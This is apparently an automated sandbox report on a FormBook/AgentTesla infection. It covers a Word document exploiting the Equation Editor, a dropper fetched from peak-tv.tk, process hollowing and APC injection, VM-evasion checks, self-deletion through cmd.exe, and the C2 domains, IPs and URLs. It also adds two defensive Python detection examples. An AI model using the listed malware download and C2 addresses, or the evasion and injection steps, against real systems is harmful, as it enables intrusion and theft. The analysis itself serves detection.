          Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000000.514300664.00000000044E7000.00000004.00000001.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.425259363.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_00BC26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026026F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Memory allocated: page read and write | page guard
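          The evasion rows above give an analyst two static indicators worth turning into a triage check: the eight-byte RDTSC stub (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc, two readings six bytes apart at 0x408614 and 0x4089AE) and the Sandboxie, Wine and VMware strings found in process memory. The script below is an added example written for this report; it is not Joe Sandbox code and not the sample's own code. SAMPLE_IMAGE is a constructed buffer that places the reported stub at the reported offsets and appends two of the reported strings, so the example runs offline without the real binary.

```python
"""Static triage for the anti-analysis indicators listed above.

Added example for this report (not Joe Sandbox code and not the sample's code).
It scans a code image for the paired-RDTSC timing stub reported at 0x408614 and
0x4089AE and for the sandbox / hypervisor strings reported in process memory.
SAMPLE_IMAGE is constructed to mimic those findings; it is not the real binary.
"""
import re

# Strings quoted in the report's "Binary or memory string" rows.
SANDBOX_STRINGS = [
    b"SBIEDLL.DLL",                                  # Sandboxie's user-mode hook DLL
    b"WINE_GET_UNIX_FILE_NAME",                      # export only present under Wine
    b"SOFTWARE\\VMware, Inc.\\VMware Tools",         # VMware Tools registry key
    b"C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\",
    b"VMware SVGA II",                               # VMware display adapter name
]

RDTSC = b"\x0f\x31"       # opcode bytes of the x86 RDTSC instruction
MAX_GAP = 16              # max bytes between the two RDTSCs; the reported stub has 4

def find_rdtsc_pairs(code: bytes, base: int = 0, max_gap: int = MAX_GAP):
    """Return (first_va, second_va) for each RDTSC closely followed by another RDTSC.
    Two readings a few instructions apart are how the sample measures elapsed cycles
    to spot a slow hypervisor or a single-stepping debugger."""
    offsets = [m.start() for m in re.finditer(re.escape(RDTSC), code)]
    pairs = []
    for first, second in zip(offsets, offsets[1:]):
        gap = second - (first + len(RDTSC))
        if 0 <= gap <= max_gap:
            pairs.append((base + first, base + second))
    return pairs

def find_sandbox_strings(data: bytes):
    """Case-insensitive search; returns {indicator: offset}."""
    lowered = data.lower()
    hits = {}
    for needle in SANDBOX_STRINGS:
        idx = lowered.find(needle.lower())
        if idx != -1:
            hits[needle.decode()] = idx
    return hits

def triage(image: bytes, base: int = 0):
    pairs = find_rdtsc_pairs(image, base)
    strings = find_sandbox_strings(image)
    tags = []
    if pairs:
        tags.append("rdtsc-timing-check")
    if any(s.startswith(("SBIEDLL", "WINE")) for s in strings):
        tags.append("sandbox-detection")
    if any("vmware" in s.lower() for s in strings):
        tags.append("vm-detection")
    return {"rdtsc_pairs": pairs, "strings": strings, "tags": tags}

# Constructed image: the reported 8-byte stub (rdtsc; xor ecx,ecx; add ecx,eax; rdtsc)
# at file offsets 0x8614 and 0x89AE so that, with base 0x400000, the virtual
# addresses match the report, followed by two of the reported strings.
TIMING_STUB = b"\x0f\x31" + b"\x31\xc9" + b"\x01\xc1" + b"\x0f\x31"
SAMPLE_IMAGE = (
    b"\x90" * 0x8614
    + TIMING_STUB
    + b"\x90" * (0x89AE - (0x8614 + len(TIMING_STUB)))
    + TIMING_STUB
    + b"\x00" * 16
    + b"SBIEDLL.DLL\x00"
    + b"SOFTWARE\\VMware, Inc.\\VMware Tools\x00"
)

if __name__ == "__main__":
    result = triage(SAMPLE_IMAGE, base=0x400000)
    for first, second in result["rdtsc_pairs"]:
        print(f"rdtsc pair at {first:#010x} / {second:#010x}")
    print(result["strings"], result["tags"])
```

          The gap threshold matters: a lone rdtsc is common in legitimate timing code, while two readings within a handful of bytes, as here, almost always bracket nothing but the measurement itself and exist only to compare the delta against a hypervisor-sized threshold.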

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.muzicalbox.com
          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.13 80
          Source: C:\Windows\explorer.exe | Domain query: www.extraordinarymiracle.com
          Source: C:\Windows\explorer.exe | Domain query: www.realstakepool.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 109.94.209.123 80
          Source: C:\Windows\explorer.exe | Domain query: www.prestigiousuniforms.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: C40000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Memory written: C:\Users\user\AppData\Roaming\medicomsh78694.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\msdt.exe | Thread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp | Binary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Queries volume information: C:\Users\user\AppData\Roaming\medicomsh78694.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
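          The rows in this section, together with the EQNEDT32.EXE file-creation and process-creation rows earlier in the report, describe a chain that a detection engineer can correlate per process: the Equation Editor dropping a PE, spawning it and reaching the network; the dropper unmapping a section in msdt.exe, writing an MZ image and setting a thread context; an APC queued into explorer.exe; and explorer.exe, a system process, then resolving and connecting to the C2 hosts before msdt.exe deletes the dropper through cmd.exe. The correlation engine below is an added example written for this report, not Joe Sandbox code and not the sample's. EVENTS is a constructed, normalised event stream modelled on those rows; its field names are the example's own, and where the report only gives a PID or a base address (the thread-context target, the bytes written into the hollowed process) the values are filled in for illustration.

```python
"""Correlate the behavioural rows above into alerts.

Added example for this report (not Joe Sandbox code and not the sample's).
EVENTS is a constructed, normalised event stream modelled on the report's
"File created", "Process created", "Network Connect", "Section unmapped",
"Memory written", "Thread register set" and "Thread APC queued" rows. The
field names are this example's own; the injection target and the PE bytes
written into it are filled in for illustration where the report only gives a
PID or a base address.
"""
from collections import defaultdict

SYSTEM_PROCESSES = {"explorer.exe", "msdt.exe", "svchost.exe"}
INJECT_STEPS = {"section_unmap", "memory_write", "thread_context_set", "apc_queue"}
HOLLOWING_STEPS = {"section_unmap", "memory_write", "thread_context_set"}

EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPER = r"C:\Users\user\AppData\Roaming\medicomsh78694.exe"

EVENTS = [
    {"src": EQNEDT, "type": "net_connect", "dst": "2.58.149.41:80"},
    {"src": EQNEDT, "type": "file_create", "path": DROPPER, "magic": b"MZ"},
    {"src": EQNEDT, "type": "process_create", "child": DROPPER},
    {"src": DROPPER, "type": "section_unmap", "target": r"C:\Windows\SysWOW64\msdt.exe"},
    {"src": DROPPER, "type": "memory_write", "target": r"C:\Windows\SysWOW64\msdt.exe",
     "base": 0x400000, "data": b"MZ\x90\x00"},
    {"src": DROPPER, "type": "thread_context_set", "target": r"C:\Windows\SysWOW64\msdt.exe"},
    {"src": DROPPER, "type": "apc_queue", "target": r"C:\Windows\explorer.exe"},
    {"src": r"C:\Windows\explorer.exe", "type": "dns_query", "name": "www.realstakepool.com"},
    {"src": r"C:\Windows\explorer.exe", "type": "net_connect", "dst": "91.195.240.13:80"},
    {"src": r"C:\Windows\SysWOW64\msdt.exe", "type": "process_create",
     "child": r'C:\Windows\SysWOW64\cmd.exe /c del "' + DROPPER + '"'},
]

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def correlate(events):
    """Run the rules over an ordered event list; returns (rule, source, detail) tuples."""
    alerts, seen = [], set()
    inject_state = defaultdict(set)      # (injector, target) -> steps observed so far
    injected = set()                      # images that were the target of an injection

    def fire(rule, src, detail):
        if (rule, src, detail) not in seen:
            seen.add((rule, src, detail))
            alerts.append((rule, src, detail))

    for ev in events:
        src, kind = basename(ev["src"]), ev["type"]

        # Equation Editor never spawns children, drops PEs or talks to the network on its own.
        if src == "eqnedt32.exe":
            if kind == "process_create":
                fire("eqnedt32_spawns_process", src, ev["child"])
            elif kind == "file_create" and ev.get("magic", b"").startswith(b"MZ"):
                fire("eqnedt32_drops_pe", src, ev["path"])
            elif kind == "net_connect":
                fire("eqnedt32_network", src, ev["dst"])

        # Hollowing: unmap the target's image, write a PE, redirect a thread into it.
        if kind in INJECT_STEPS:
            target = basename(ev["target"])
            is_pe_write = kind == "memory_write" and ev.get("data", b"").startswith(b"MZ")
            if kind != "memory_write" or is_pe_write:
                steps = inject_state[(src, target)]
                steps.add(kind)
                if HOLLOWING_STEPS <= steps:
                    fire("process_hollowing", src, target)
                    injected.add(target)
                if kind == "apc_queue":
                    fire("apc_injection", src, target)
                    injected.add(target)

        # A system process that was injected into and then reaches out is the C2 channel.
        if kind in {"dns_query", "net_connect"} and src in SYSTEM_PROCESSES and src in injected:
            fire("injected_system_process_network", src, ev.get("name") or ev.get("dst"))

        # Clean-up of the dropper through cmd.exe.
        if kind == "process_create":
            cmdline = ev["child"].lower()
            if "cmd.exe" in cmdline and " del " in cmdline:
                fire("self_delete_via_cmd", src, ev["child"])

    return alerts

if __name__ == "__main__":
    for rule, src, detail in correlate(EVENTS):
        print(f"{rule:32} {src:22} {detail}")
```

          Ordering is what makes the last two rules cheap to state: explorer.exe talking to the network is only suspicious after it has been the target of an injection, so the engine keeps the set of injected images and consults it on every later DNS or connect event rather than alerting on system-process traffic in general.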

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Digits following a technique name are the report's badges marking the techniques this sample matched; cells without digits are the unmatched remainder of the matrix.

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 321 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Information Discovery 113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 12 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 552782  Sample: PO789.doc  Startdate: 13/01/2022  Architecture: WINDOWS  Score: 100

          Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 17 other signatures. DNS: www.danielkcarter.store

          Process tree (numbers in parentheses are the graph's per-process badges for created files and registry values; the graph's edges are rendered as indentation):

          WINWORD.EXE (291, 19)  started
            dropped: C:\Users\user\Desktop\~$PO789.doc, data
            dropped: ~WRF{828CF0EA-BCAC...1-FE0BC8A11CE4}.tmp, Composite
          EQNEDT32.EXE (11)  started
            network: peak-tv.tk 2.58.149.41, 49167, 80, GBTCLOUDUS, Netherlands
            dropped: C:\Users\user\AppData\...\medicomsh78694.exe, PE32
            dropped: C:\Users\user\AppData\...\medicomzx[1].exe, PE32
            signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            medicomsh78694.exe (1, 5)  started
              signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
              medicomsh78694.exe  started
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                explorer.exe  injected
                  network: www.realstakepool.com 91.195.240.13, 49172, 80, SEDO-ASDE, Germany
                  network: shops.myshopify.com 23.227.38.74, 49168, 80, CLOUDFLARENETUS, Canada
                  network: 4 other IPs or domains
                  signature: System process connects to network (likely due to code injection or exploit)
                  msdt.exe  started
                    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe  started

          Screenshots

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          PO789.doc | 58% | Virustotal |
          PO789.doc | 54% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\medicomsh78694.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe | 34% | Metadefender |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe | 51% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          C:\Users\user\AppData\Roaming\medicomsh78694.exe | 34% | Metadefender |
          C:\Users\user\AppData\Roaming\medicomsh78694.exe | 51% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.0.medicomsh78694.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.medicomsh78694.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.medicomsh78694.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.2.medicomsh78694.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          peak-tv.tk | 5% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://www.realstakepool.com/md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i | 0% | Avira URL Cloud | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://www.prestigiousuniforms.com/md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i | 0% | Avira URL Cloud | safe
          www.carbonfiber.cloud/md4m/ | 0% | Avira URL Cloud | safe
          http://java.sun.com | 0% | URL Reputation | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://peak-tv.tk/medicomzx.exe | 100% | Avira URL Cloud | malware
          http://www.small-icons.com/packs/16x16-free-application-icons.htm | 0% | Avira URL Cloud | safe
          http://splashyfish.com/icons/ | 0% | Avira URL Cloud | safe
          http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i | 100% | Avira URL Cloud | malware
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://led24.de/iconset/ | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i | 100% | Avira URL Cloud | malware
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          peak-tv.tk | 2.58.149.41 | true | true |  | unknown
          www.extraordinarymiracle.com | 109.94.209.123 | true | true |  | unknown
          www.realstakepool.com | 91.195.240.13 | true | true |  | unknown
          shops.myshopify.com | 23.227.38.74 | true | true |  | unknown
          muzicalbox.com | 34.102.136.180 | true | false |  | unknown
          www.danielkcarter.store | 172.67.181.75 | true | false |  | unknown
          www.muzicalbox.com | unknown | unknown | true |  | unknown
          www.prestigiousuniforms.com | unknown | unknown | true |  | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.realstakepool.com/md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i | true | Avira URL Cloud: safe | unknown
http://www.prestigiousuniforms.com/md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i | true | Avira URL Cloud: safe | unknown
www.carbonfiber.cloud/md4m/ | true | Avira URL Cloud: safe | low
http://peak-tv.tk/medicomzx.exe | true | Avira URL Cloud: malware | unknown
http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i | false | Avira URL Cloud: malware | unknown
http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i | true | Avira URL Cloud: malware | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://investor.msn.com | explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.434207540.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.445067687.000000000031D000.00000004.00000020.sdmp | false | | high
https://visualpharm.com/must_have_icon_set/ | medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | false | | high
https://github.com/proviq/lusrmgr/Chttps://github.com/proviq/lusrmgr | medicomsh78694.exe, 00000004.00000002.423480427.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000004.00000000.408501370.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | false | | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
